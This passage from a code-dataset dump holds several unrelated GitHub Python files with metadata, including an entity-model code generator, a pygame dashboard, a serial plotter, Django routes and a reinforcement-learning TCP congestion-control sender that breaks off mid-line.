ftype\r\n\r\n    if is_array:\r\n        dims=dimension.split(\",\")\r\n        field[\"type\"] = \"ndarray\"\r\n        field[\"type_description\"] = \"ndarray of \" + ftype\r\n        field[\"ftype\"] = ftype\r\n        field[\"init\"] = \"[]\"\r\n        field[\"setter\"] = f\"asarray(value, dtype={ftype})\"\r\n        field[\"ndim\"] = len(dims)\r\n\r\n    else:\r\n        field[\"setter\"] = __map(ftype, setters)\r\n        field[\"default\"] = __find_default_value(attribute, ftype)\r\n        field[\"init\"] = field[\"default\"]\r\n\r\n    return field\r\n\r\ndef __rename_if_reserved(name):\r\n    if keyword.iskeyword(name):\r\n        return name + \"_\"\r\n    return name\r\n\r\n\r\n\r\ndef __create_blueprint_field(field, blueprint: Blueprint, is_array) -> Dict:\r\n    field[\"is_entity\"] = True\r\n    import_package: Package = blueprint.get_parent()\r\n    paths=import_package.get_paths()\r\n    bp_path = \".\".join(paths) + \".\" + blueprint.name.lower()\r\n    field[\"module\"] = bp_path\r\n    if is_array:\r\n        field[\"type\"] = \"List[\"+blueprint.name+\"]\"\r\n        field[\"simple_type\"] = blueprint.name\r\n        field[\"init\"] = \"list()\"\r\n        field[\"setter\"] = \"[]\"\r\n    else:\r\n        field[\"type\"] = blueprint.name\r\n        field[\"setter\"] = \"value\"\r\n        field[\"init\"] = \"None\"\r\n    return field\r\n\r\ndef __create_enum_field(field,attribute: BlueprintAttribute, package: Package, enum_type: str, imports) -> Dict:\r\n    enum = package.get_enum(enum_type)\r\n    imports[enum.name]=enum\r\n    field[\"is_entity\"] = False\r\n    field[\"type\"] = enum.name\r\n    field[\"setter\"] = \"value\"\r\n    init=attribute.content.get(\"default\",enum.default)\r\n    field[\"init\"] = enum.name + \".\" +init\r\n    return field\r\n\r\ndef __map(key, values):\r\n    converted = values.get(key)\r\n    if not converted:\r\n        raise Exception('Unknown type ' + key)\r\n    return converted\r\n\r\n\r\ndef __map_type(ptype):\r\n    return __map(ptype, types)\r\n\r\n\r\ndef find_default_value(attribute: BlueprintAttribute):\r\n    \"\"\"Returns the default value literal\"\"\"\r\n    a_type: str = attribute.get(\"attributeType\")\r\n    etype = __map_type(a_type)\r\n    return __find_default_value(attribute, etype)\r\n\r\ndef __find_default_value(attribute: BlueprintAttribute, etype: str):\r\n    default_value = attribute.get(\"default\")\r\n    if default_value is not None:\r\n        return __convert_default(attribute,default_value)\r\n    return default_values[etype]\r\n\r\n\r\ndef __convert_default(attribute: BlueprintAttribute, default_value):\r\n    # converts json value to Python value\r\n    if isinstance(default_value,str):\r\n        if default_value == '' or default_value == '\"\"':\r\n            return '\"\"'\r\n        elif attribute.type == 'integer':\r\n            return int(default_value)\r\n        elif attribute.type == 'number':\r\n            
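# numeric defaults are stored as strings in the blueprint JSON, so coerce to float here\r\n            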
return float(default_value)\r\n elif attribute.type == 'boolean':\r\n return default_value.lower() == \"true\"\r\n else:\r\n return \"'\" + default_value + \"'\"\r\n return default_value\r\n\r\ndef __to_type_string(string: str) -> str:\r\n return string[:1].upper() + string[1:]\r\n\r\ndef __to__imports(pkg: Package, blueprints: Set[Blueprint]) -> Sequence[str]:\r\n imports = __to__import_infos(pkg, blueprints)\r\n statements = [__to_import_statement(x) for x in imports]\r\n statements.sort()\r\n return statements\r\n\r\ndef __to_import_statement(import_info: Dict) -> str:\r\n module=import_info[\"module\"]\r\n name=import_info[\"name\"]\r\n return f\"from {module} import {name}\"\r\n\r\n\r\ndef __to__import_infos(pkg: Package,blueprints: Set[Blueprint]) -> Sequence[Dict]:\r\n imports = []\r\n for blueprint in blueprints:\r\n bp_path=_to_relative_import_path(pkg,blueprint)\r\n name = blueprint.name\r\n if bp_path.startswith(\"system.SIMOS\"):\r\n bp_path = \"dmt.\"+ name.lower()\r\n bp_name = __to_type_string(name)\r\n import_info = {\r\n \"module\": bp_path,\r\n \"name\": bp_name\r\n }\r\n imports.append(import_info)\r\n\r\n return imports\r\n\r\ndef _to_relative_import_path(pkg: Package, blueprint: Blueprint) -> str:\r\n import_package = blueprint.get_parent()\r\n name = blueprint.name.lower()\r\n if pkg == import_package:\r\n return \".\"+name\r\n current_dir = pkg.package_dir\r\n import_dir = import_package.package_dir\r\n import_module = import_package.package_dir / name\r\n # Get me the relative path from current_dir to import_dir\r\n root_dir = pkg.get_root().package_dir\r\n if import_module.is_relative_to(root_dir) and current_dir.is_relative_to(root_dir):\r\n # Find the relative path from current_dir to import_dir\r\n relative = os.path.relpath(import_dir, current_dir)\r\n ret = \"\".join(Path(relative).parts)\r\n return ret\r\n\r\n paths = import_package.get_paths()\r\n return \".\".join(paths)\r\n\r\ndef __refers_to(blueprint: Blueprint, imports: Dict) -> bool:\r\n return blueprint in imports.values()\r\n\r\ndef __create_named_arguments(fields: Sequence[Dict]) -> str:\r\n args = []\r\n for field in fields:\r\n if not field[\"is_entity\"] and not field[\"is_array\"]:\r\n default_value = field[\"init\"]\r\n if default_value is not None:\r\n name = field[\"name\"]\r\n args.append(name + \"=\"+ str(default_value))\r\n field[\"init\"] = name\r\n\r\n if len(args) == 0:\r\n return \"\"\r\n\r\n return \", \" + \", \".join(args)\r\n\r\ndef __find_super_classes(blueprint: Blueprint) -> Sequence[Blueprint]:\r\n base_classes: OrderedDict = OrderedDict()\r\n for extension in blueprint.extensions:\r\n base_classes[extension.name]=extension\r\n return base_classes.values()\r\n\r\ndef __to__super_classes(bps: Sequence[Blueprint]) -> str:\r\n types = [__to_type_string(bp.name) for bp in bps]\r\n if types:\r\n return \",\".join(types)\r\n return \"Entity\"\r\n","repo_name":"SINTEF/dmt-gen-py","sub_path":"src/dmtpygen/generators/entity_model.py","file_name":"entity_model.py","file_ext":"py","file_size_in_byte":10211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29499667757","text":"from graphEntity import *\r\nfrom ATOM3Constraint import *\r\nfrom GraphicalForm import *\r\n\r\nclass graph_ExternalConnection(graphEntity):\r\n\r\n def __init__(self, x, y, semObject = None):\r\n self.semanticObject = semObject\r\n graphEntity.__init__(self, x, y)\r\n self.graphForms = []\r\n\r\n def DrawObject(self, drawing):\r\n self.dc = drawing\r\n h = drawing.create_line(self.translate([2.0, 3.0, 2.0, 70.0, 106.0, 70.0, 106.0, 13.0, 106.0, 13.0]), tags = self.tag, fill = \"black\")\r\n self.gf0 = GraphicalForm( drawing, h, \"gf0\")\r\n self.graphForms.append(self.gf0)\r\n\r\n h = drawing.create_line(self.translate([2.0, 3.0, 94.0, 3.0, 106.0, 14.0, 88.0, 20.0, 94.0, 3.0]), tags = self.tag, fill = \"black\")\r\n self.gf1 = GraphicalForm( drawing, h, \"gf1\")\r\n self.graphForms.append(self.gf1)\r\n\r\n h = drawing.create_oval(self.translate([15.0, 21.0, 33.0, 43.0]), tags = self.tag, fill = \"\", outline = \"black\")\r\n self.gf2 = GraphicalForm( drawing, h, \"gf2\")\r\n self.graphForms.append(self.gf2)\r\n\r\n h = drawing.create_oval(self.translate([53.0, 36.0, 70.0, 58.0]), tags = self.tag, fill = \"\", outline = \"black\")\r\n self.gf3 = GraphicalForm( drawing, h, \"gf3\")\r\n self.graphForms.append(self.gf3)\r\n\r\n h = drawing.create_oval(self.translate([46.0, 11.0, 62.0, 30.0]), tags = self.tag, fill = \"\", outline = \"black\")\r\n self.gf4 = GraphicalForm( drawing, h, \"gf4\")\r\n self.graphForms.append(self.gf4)\r\n\r\n h = drawing.create_line(self.translate([32.0, 25.0, 46.0, 22.0]), tags = self.tag, fill = \"black\")\r\n self.gf5 = GraphicalForm( drawing, h, \"gf5\")\r\n self.graphForms.append(self.gf5)\r\n\r\n h = drawing.create_line(self.translate([56.0, 29.0, 59.0, 35.0]), tags = self.tag, fill = \"black\")\r\n self.gf6 = GraphicalForm( drawing, h, \"gf6\")\r\n self.graphForms.append(self.gf6)\r\n\r\n h = drawing.create_line(self.translate([32.0, 38.0, 54.0, 44.0]), tags = self.tag, fill = \"black\")\r\n self.gf7 = GraphicalForm( drawing, h, \"gf7\")\r\n self.graphForms.append(self.gf7)\r\n\r\n h = drawing.create_line(self.translate([75.0, 26.0, 98.0, 26.0]), tags = self.tag, fill = \"black\")\r\n self.gf8 = GraphicalForm( drawing, h, \"gf8\")\r\n self.graphForms.append(self.gf8)\r\n\r\n h = drawing.create_line(self.translate([74.0, 34.0, 98.0, 34.0]), tags = self.tag, fill = \"black\")\r\n self.gf9 = GraphicalForm( drawing, h, \"gf9\")\r\n self.graphForms.append(self.gf9)\r\n\r\n h = drawing.create_line(self.translate([74.0, 41.0, 97.0, 41.0]), tags = self.tag, fill = \"black\")\r\n self.gf10 = GraphicalForm( drawing, h, \"gf10\")\r\n self.graphForms.append(self.gf10)\r\n\r\n h = drawing.create_text(self.translate([55.0, 64.0]), tags = self.tag, text = \"Ext. 
connection\", fill = \"black\")\r\n self.gf11 = GraphicalForm( drawing, h, \"gf11\")\r\n self.graphForms.append(self.gf11)\r\n\r\n h = drawing.create_oval(self.translate([52.0, 72.0, 52.0, 72.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([3.0, 37.0, 3.0, 37.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([51.0, 3.0, 51.0, 3.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([107.0, 40.0, 107.0, 40.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([3.0, 71.0, 3.0, 71.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([3.0, 5.0, 3.0, 5.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([96.0, 5.0, 96.0, 5.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([107.0, 15.0, 107.0, 15.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n h = drawing.create_oval(self.translate([107.0, 71.0, 107.0, 71.0]), tags = self.tag, fill = \"red\", outline = \"black\")\r\n self.connectors.append(h)\r\n\r\nnew_class = graph_ExternalConnection\r\n","repo_name":"AILab-FOI/LSMASOMM","sub_path":"atom3/Kernel/GraphicalObjects/graph_ExternalConnection.py","file_name":"graph_ExternalConnection.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"33685415275","text":"#import\r\nimport streamlit as st\r\nfrom PIL import Image\r\nfrom predict import predict, filenames\r\n\r\n# uploading image\r\nst.header('Equipment Identification')\r\nst.title(\"Predict New Images\")\r\nuploadedfile = st.file_uploader(\"Choose Image\", type = ['jpg','png','jpeg'])\r\n\r\nif uploadedfile is not None:\r\n # Make prediction\r\n image = Image.open(uploadedfile)\r\n image = image.convert('RGB')\r\n image.save(\"images/tmp_image.jpg\")\r\n prediction, indices = predict(\"images/tmp_image.jpg\")\r\n\r\n # Display uploaded image\r\n st.title(\"Uploaded image\")\r\n st.image(uploadedfile, caption = 'uploaded image',width = 500)\r\n\r\n # Display similar images\r\n st.title(\"Similar images\")\r\n # similar1 = Image.open(\"CAI2\\EDC\\similar.jpg\")\r\n # st.image(similar1 ,width = 500)\r\n # similar2 = Image.open(\"CAI2\\EDC\\similar2.jpg\")\r\n # st.image(similar2 ,width = 500)\r\n for rank, idx in enumerate(indices):\r\n st.image(filenames[idx], caption = f\"similar image: {rank}\", width = 500)\r\n\r\n\r\n # Display description\r\n st.title(\"Description\")\r\n st.text_input(\"Enter some description\")\r\n\r\n # Display predictions\r\n st.title(\"Prediction\")\r\n for i in range(len(prediction)):\r\n st.checkbox(prediction[i])\r\n # Submit button\r\n st.button(\"Submit\")\r\n","repo_name":"Temp9699/CAI2021Group6","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17694675474","text":"import pygame\nimport os\n\nWIDTH = 1024\nHEIGHT = 600\nsize = (WIDTH, HEIGHT)\n\nBACKGROUND = pygame.image.load('scarletbox.jpg')\nBACKGROUND = pygame.transform.scale(BACKGROUND, size)\nBACKGROUND_RECT = BACKGROUND.get_rect()\n\n\n# Class for a simple electric car dashboard\nclass Dash(object):\n def __init__(self):\n self.screen = self.initPygame()\n self.screenRect = self.screen.get_rect()\n self.done = False\n\n self.speedSize = 200\n self.voltSize = 100\n self.speedFont = pygame.font.SysFont(\"Ubuntu Medium\", self.speedSize)\n self.voltFont = pygame.font.SysFont(\"Ubuntu Medium\", self.voltSize)\n\n self.fps = 30\n self.clock = pygame.time.Clock()\n self.keys = self.getUserInput()\n\n # Initializes Pygame\n def initPygame(self):\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n pygame.init()\n pygame.display.set_caption('Dashboard Test')\n screen = pygame.display.set_mode(size, pygame.FULLSCREEN)\n return screen\n\n # Checks for exit, returns key presses\n def getUserInput(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.done = True\n keys = pygame.key.get_pressed()\n return keys\n\n # Updates all text rects\n def updateText(self):\n speed = self.speedFont.render(\"88 mph\", 1, (255, 255, 255))\n speedRect = speed.get_rect()\n speedRect.centerx = WIDTH/2\n speedRect.centery = HEIGHT/3\n self.screen.blit(speed, speedRect)\n \n volt = self.voltFont.render(\"114.6 V\", 1, (255, 255, 255))\n voltRect = speed.get_rect()\n voltRect.centerx = WIDTH/2 + (self.speedSize - self.voltSize)\n voltRect.centery = HEIGHT/4 * 2 + (self.speedSize - self.voltSize)\n self.screen.blit(volt, voltRect)\n\n # Update all Dash components and exit upon ESC press\n def update(self):\n while not self.done and not self.keys[pygame.K_ESCAPE]:\n self.keys = self.getUserInput()\n currentTime = pygame.time.get_ticks()\n self.screen.blit(BACKGROUND, BACKGROUND_RECT)\n \n self.updateText()\n\n pygame.display.update()\n self.clock.tick(60)\n pygame.quit()\n\ndash = Dash()\ndash.update()\n","repo_name":"ianballou/electricdash","sub_path":"textspeedmeter.py","file_name":"textspeedmeter.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3162687369","text":"SD_CARD_PATH = '/sd'\n\nDATA_LOGGER = {\n 'dir': 'sensor_log',\n 'use_sd': True,\n}\n\nLOGGING_FILE = '/logs/log.txt'\n\nFAN = {\n 'turn_on_speed': 90,\n 'turn_off_speed': 80,\n 'min_speed': 85,\n 'starting_speed': 100,\n 'starting_time': 500,\n 'pwm_frequency': 440,\n}\n\nTICK_PERIOD = 50 # milliseconds\nOPERATIONAL_PERIOD = 1000 # milliseconds\n\nOPERATIONAL_FREQUENCY = int(OPERATIONAL_PERIOD/TICK_PERIOD)\n\nTARGET_TEMPERATURE = 90\n\nPINS = {\n 'fan': 12,\n 'fan_led': 13,\n 'test_toggle': 27,\n 'full_throttle_toggle': 26,\n 'tempsensor': 33,\n 'tempsensor_aux': 32,\n 'buzzer': 10,\n}","repo_name":"shushkaden/mp-fan_controller","sub_path":"src/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31412575096","text":"import tkinter as tk\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport matplotlib.animation as animation\nimport serial\nimport threading\nimport queue\n\nclass SerialThread(threading.Thread):\n def __init__(self, queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n s = serial.Serial('COM14', 115200)\n s.reset_input_buffer()\n\n last_value = 0\n while True:\n data = s.readline().decode().strip()\n if data:\n try:\n last_value = float(data)\n self.queue.put(last_value)\n except ValueError:\n # If we cannot convert data to float, put the last valid value instead\n self.queue.put(last_value)\n\n\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.queue = queue.Queue()\n self.fig = Figure(figsize=(5, 5), dpi=100)\n self.ax = self.fig.add_subplot(111)\n self.graph = FigureCanvasTkAgg(self.fig, master=self)\n self.graph.get_tk_widget().pack(side=\"top\", fill='both', expand=True)\n\n self.thread = SerialThread(self.queue)\n self.thread.start()\n\n self.data = []\n self.ani = animation.FuncAnimation(self.fig, self.animate, interval=10)\n\n def animate(self, i):\n while self.queue.qsize():\n try:\n data_str = self.queue.get()\n try:\n self.data.append(float(data_str))\n if len(self.data) > 200: # Limit data array length\n self.data.pop(0)\n except ValueError:\n pass # Ignore values that cannot be converted to float\n except queue.Empty:\n pass\n self.ax.clear()\n self.ax.plot(self.data)\n\n\n\nif __name__ == '__main__':\n app = App()\n app.mainloop()\n","repo_name":"lbarretoe/EKmotion","sub_path":"codigoverdad/EKmotion copy.py","file_name":"EKmotion copy.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5622697822","text":"allist=[]\ndatetime=[]\nipadrress=[]\nmsisdn=[]\nplan=[]\npackage=[]\nport=[]\nhttpmethod=[]\nhttpcode=[]\nlogid=[]\nlineno=0\nflag=0\nwith open('apache.log', 'r') as inputfile:\n for line in inputfile: \n for word in line.split(): \n allist.append(word)\n lineno+=1\n \n j=0 \n for i in range(lineno):\n datetime.append(allist[j])\n j+=11\n j=1 \n for i in range(lineno):\n ipadrress.append(allist[j])\n j+=11\n j=3 \n for i in range(lineno):\n msisdn.append(allist[j])\n j+=11 \n j=4 \n for i in range(lineno):\n plan.append(allist[j])\n j+=11\n j=5 \n for i in range(lineno):\n package.append(allist[j])\n j+=11\n j=6 \n for i in range(lineno):\n port.append(allist[j])\n j+=11\n j=7 \n for i in range(lineno):\n httpmethod.append(allist[j])\n j+=11\n j=9 \n for i in range(lineno):\n httpcode.append(allist[j])\n j+=11\n \n j=10\n for i in range(lineno):\n logid.append(allist[j])\n j+=11\nprint(datetime)\nprint(ipadrress)\nprint(msisdn)\nprint(plan)\nprint(package)\nprint(port)\nprint(httpmethod)\nprint(httpcode)\nprint(logid)\n","repo_name":"techsharif/python_training_2021","sub_path":"day4/code_analysis/day3_hw.py","file_name":"day3_hw.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"30510852204","text":"from django.urls import path,include\nfrom . import views\nurlpatterns = [\n path('',views.index,name=\"home\"),\n # path('',views.commentPost,name=\"comment\"),\n path('upload',views.upload,name=\"upload\"),\n path('like',views.like_post,name=\"like\"),\n path('profile/',views.profile,name=\"profile\"),\n path('edit/',views.edit,name=\"edit\"),\n path('search',views.search_username,name=\"search\"),\n # path('search-profile',views.search_profile,name=\"search-profle\"),\n path('profile-info',views.profile_info,name=\"profile-info\"),\n path('commentPost/',views.commentPostapi,name=\"commentPost\"),\n # path('comment/',views.comment,name=\"comment\"),\n]\n","repo_name":"luckyklyist/insta-clone","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71788344081","text":"import time\nimport random\nimport math\nimport json\nimport torch\nfrom operator import itemgetter\nfrom typing import List, Dict, Tuple, Optional\nfrom src.strategies import SenderStrategy\nfrom src.ml_helpers import optimize_model, Transition, LSTM_DQN\n\nDEFAULT_TIMEOUT = 2\nBETA_CUBIC = 0.7\nCUBIC_CONSTANT = 4 # This is c from the CUBIC algorithm\n\nclass ReinforcementStrategy(SenderStrategy):\n def __init__(self, policy_net: LSTM_DQN, target_net: LSTM_DQN, device: torch.device, optimizer, hyperparameters: Dict, episode_num: int, transitions: List[Dict]) -> None:\n self.device = device\n self.cwnd = 1\n self.fast_retransmit_packet = None\n self.time_since_retransmit = None\n self.retransmitting_packet = False\n self.ack_count = 0\n self.timeout = DEFAULT_TIMEOUT\n self.fast_retransmitted_packets_in_flight = []\n\n self.duplicated_ack = None\n self.slow_start_thresholds = []\n\n self.next_packet_rewards = {} # Mapping of sequence number to action/state combination\n\n self.sequence_history_dict = {} # list with some fixed size\n self.transitions = transitions\n self.base_rtt = None\n \"\"\"ML initialization\"\"\"\n self.policy_net = policy_net\n self.target_net = target_net\n self.optimizer = optimizer\n self.episode = episode_num\n self.losses = []\n self.hyperparameters = hyperparameters\n self.time_since_last_drop = time.time()\n\n # CUBIC variables\n self.w_max = 42\n super().__init__()\n\n def select_next_action(self, state: torch.tensor):\n sample = random.random()\n eps_threshold = self.hyperparameters['EPS_END'] + (self.hyperparameters['EPS_START'] - self.hyperparameters['EPS_END']) * \\\n math.exp(-1. * self.episode / self.hyperparameters['EPS_DECAY'])\n if sample > eps_threshold:\n with torch.no_grad():\n return self.policy_net(state.unsqueeze(0)).max(1)[1].view(1, 1)\n else:\n return torch.tensor([[random.randrange(len(self.hyperparameters['Actions']))]], device=self.device, dtype=torch.long)\n\n\n def window_is_open(self) -> bool:\n # next_ack is the sequence number of the next acknowledgement\n # we are expecting to receive. If the gap between next_ack and\n # seq_num is greater than the window, then we need to wait for\n # more acknowledgements to come in.\n return self.seq_num - self.next_ack < self.cwnd\n\n def next_packet_to_send(self) -> Optional[str]:\n send_data = None\n in_greater_than_one_retransmit = False\n if self.retransmitting_packet and self.time_of_retransmit and time.time() - self.time_of_retransmit > self.timeout:\n # The retransmit packet timed out--resend it\n self.retransmitting_packet = False\n in_greater_than_one_retransmit = True\n\n if self.fast_retransmit_packet and not self.retransmitting_packet:\n # Logic for resending the packet\n self.unacknowledged_packets[self.fast_retransmit_packet['seq_num']]['send_ts'] = time.time()\n send_data = self.fast_retransmit_packet\n send_data['is_retransmit'] = True\n serialized_data = json.dumps(send_data)\n self.retransmitting_packet = True\n self.time_of_retransmit = time.time()\n\n elif self.window_is_open():\n send_data = {\n 'seq_num': self.seq_num,\n 'send_ts': time.time(),\n 'cwnd': self.cwnd,\n 'is_retransmit': False\n }\n\n self.unacknowledged_packets[self.seq_num] = send_data\n self.seq_num += 1\n elif not self.fast_retransmit_packet:\n # Check to see if any segments have timed out. 
Note that this\n # isn't how TCP actually works--traditional TCP uses exponential\n # backoff for computing the timeouts\n for seq_num, segment in self.unacknowledged_packets.items():\n if seq_num < self.seq_num and time.time() - segment['send_ts'] > self.timeout:\n segment['send_ts'] = time.time()\n segment['is_retransmit'] = True\n # Update reinforcement learning based on previous window size increase\n self.handle_packet_loss(seq_num, segment)\n return json.dumps(segment)\n\n if send_data is None:\n return None\n else:\n return json.dumps(send_data)\n\n def handle_packet_loss(self, seq_num: int, segment: Dict):\n self.fast_retransmitted_packets_in_flight.append(seq_num)\n self.fast_retransmit_packet = segment\n self.sequence_history_dict[seq_num] = {\n 'cwnd': segment['cwnd'],\n 'rtt': 0,\n 'dropped_packet': True\n }\n current_state = self.compute_state(max(seq_num - self.hyperparameters['STATE_WINDOW_SIZE'], 0), seq_num)\n current_state = self.state_to_tensor(current_state)\n\n current_action = self.select_next_action(current_state)\n self.take_action(current_action)\n self.update_q_function(seq_num, 0, True)\n\n def compute_w_cubic(self, t: float) -> int:\n k = (self.w_max * ((1 - BETA_CUBIC)/CUBIC_CONSTANT)) ** (1/3)\n return 4 * (((t)-k) ** 3) + self.w_max\n\n def process_ack(self, serialized_ack: str) -> None:\n ack = json.loads(serialized_ack)\n if ack.get('handshake'):\n return\n\n self.total_acks += 1\n self.times_of_acknowledgements.append(((time.time() - self.start_time), ack['seq_num']))\n\n if self.unacknowledged_packets.get(ack['seq_num']) is None:\n # Duplicate ack\n #print(\"received dup ack\")\n self.num_duplicate_acks += 1\n if self.duplicated_ack and ack['seq_num'] == self.duplicated_ack['seq_num']:\n self.curr_duplicate_acks += 1\n else:\n self.duplicated_ack = ack\n self.curr_duplicate_acks = 1\n\n if self.curr_duplicate_acks == 3 and (ack['seq_num'] + 1) not in self.fast_retransmitted_packets_in_flight:\n # Received 3 duplicate acks, count this as packet loss\n self.handle_packet_loss(ack['seq_num'] + 1, self.unacknowledged_packets[ack['seq_num'] + 1])\n elif ack['seq_num'] >= self.next_ack:\n if self.fast_retransmit_packet is not None:\n self.fast_retransmit_packet = None\n self.retransmitting_packet = False\n self.curr_duplicate_acks = 0\n self.seq_num = ack['seq_num'] + 1\n\n self.fast_retransmitted_packets_in_flight = []\n\n # Acknowledge all packets where seq_num < ack['seq_num']\n self.unacknowledged_packets = {\n k:v\n for k,v in\n self.unacknowledged_packets.items()\n if k > ack['seq_num']\n }\n self.next_ack = max(self.next_ack, ack['seq_num'] + 1)\n self.seq_num = self.next_ack\n self.ack_count += 1\n self.sent_bytes = ack['ack_bytes']\n rtt = float(time.time() - ack['send_ts'])\n self.rtts.append(rtt)\n self.rtt_recordings.append((time.time(), rtt))\n if self.base_rtt is None:\n self.base_rtt = rtt\n\n self.timeout = rtt * 1.2\n self.sequence_history_dict[ack['seq_num']] = {\n 'cwnd': ack['cwnd'],\n 'rtt': rtt,\n 'dropped_packet': False,\n 'seq_num': ack['seq_num']\n }\n current_state = self.compute_state(max(ack['seq_num'] - self.hyperparameters['STATE_WINDOW_SIZE'], 0), ack['seq_num'])\n current_state = self.state_to_tensor(current_state)\n\n current_action = self.select_next_action(current_state)\n self.take_action(current_action)\n\n # TODO: Move to other function\n if len(self.unacknowledged_packets.keys()) == 0:\n reward_packet = int(self.cwnd) + ack['seq_num']\n else:\n reward_packet = (int(self.cwnd) - len(self.unacknowledged_packets)) + 
max(self.unacknowledged_packets.keys())\n\n self.next_packet_rewards[reward_packet] = (\n (max(ack['seq_num'] - self.hyperparameters['STATE_WINDOW_SIZE'], 0), ack['seq_num']),\n torch.tensor([int(current_action)], device=self.device, dtype=torch.long)\n )\n self.update_q_function(ack['seq_num'], rtt)\n\n self.cwnds.append((time.time(), self.cwnd))\n\n def state_to_tensor(self, state: List) -> torch.Tensor:\n current_state = [[ elem[feature] for feature in self.hyperparameters['FEATURES'] ] for elem in state ]\n pad = [[0.0] * len(self.hyperparameters['FEATURES']) ] * (self.hyperparameters['STATE_WINDOW_SIZE'] - len(current_state))\n current_state = pad + current_state\n return torch.tensor(current_state, device=self.device)\n\n def take_action(self, action: int):\n if action == self.hyperparameters['Actions']['INCREASE_QUADRATIC']:\n self.cwnd = self.compute_w_cubic(time.time() - self.time_since_last_drop)\n elif action == self.hyperparameters['Actions']['INCREASE_ABSOLUTE']:\n self.cwnd = self.cwnd + self.hyperparameters['ABSOLUTE_CHANGE']/self.cwnd\n elif action == self.hyperparameters['Actions']['DECREASE_PERCENT']:\n self.cwnd = max(self.cwnd * (1 - self.hyperparameters['PERCENT_CHANGE']), 1)\n elif action == self.hyperparameters['Actions']['DECREASE_ABSOLUTE']:\n self.cwnd = max(self.cwnd - self.hyperparameters['ABSOLUTE_CHANGE'], 1)\n elif action == self.hyperparameters['Actions']['DECREASE_DRAMATIC']:\n self.cwnd = max(self.cwnd * (1 - self.hyperparameters['DRAMATIC_PERCENT_CHANGE']), 1)\n elif action == self.hyperparameters['Actions']['STAY']:\n self.cwnd = self.cwnd\n elif action == self.hyperparameters['Actions']['UPDATE_WMAX']:\n self.w_max = self.cwnd\n elif action == self.hyperparameters['Actions']['RESET_CONGESTION_AVOIDANCE_TIME']:\n self.time_since_last_drop = time.time()\n\n def update_q_function(self, seq_num: int, rtt: float = None, dropped_packet: bool = False):\n # Update Q Function\n\n if self.next_packet_rewards.get(seq_num):\n \"\"\"In this function, we can now construct state, reward & next state, and add to the Q function\"\"\"\n sequence_range, action = self.next_packet_rewards.get(seq_num)\n\n state = self.compute_state(*sequence_range)\n next_state = self.compute_state(max(seq_num - self.hyperparameters['STATE_WINDOW_SIZE'], 0), seq_num)\n\n reward = self.compute_reward(rtt, action, dropped_packet)\n\n self.transitions.append(\n Transition(\n self.state_to_tensor(state).unsqueeze(0),\n action,\n self.state_to_tensor(next_state).unsqueeze(0),\n torch.tensor([reward], device=self.device, dtype=torch.float)\n )\n )\n loss = optimize_model(\n policy_net=self.policy_net,\n target_net=self.target_net,\n device=self.device,\n optimizer=self.optimizer,\n transitions=self.transitions,\n batch_size=self.hyperparameters['BATCH_SIZE'],\n reward_decay=self.hyperparameters['REWARD_DECAY']\n )\n self.losses.append(loss)\n\n del self.next_packet_rewards[seq_num]\n\n def compute_state(self, begin: int, end: int) -> List[Dict]:\n return list(list(zip(*sorted([(seq_num, state)\n for seq_num, state in self.sequence_history_dict.items()\n if seq_num >= begin and seq_num <= end], key=itemgetter(0))[-self.hyperparameters['STATE_WINDOW_SIZE']:]))[1])\n\n def compute_reward(self, rtt: float, action: int, dropped_packet: bool):\n if dropped_packet:\n return self.hyperparameters['Rewards']['DROPPED_PACKET']\n elif rtt > (self.base_rtt * 10):\n return self.hyperparameters['Rewards']['RTT_IS_WAY_TOO_BIG']\n elif rtt > (self.base_rtt * 
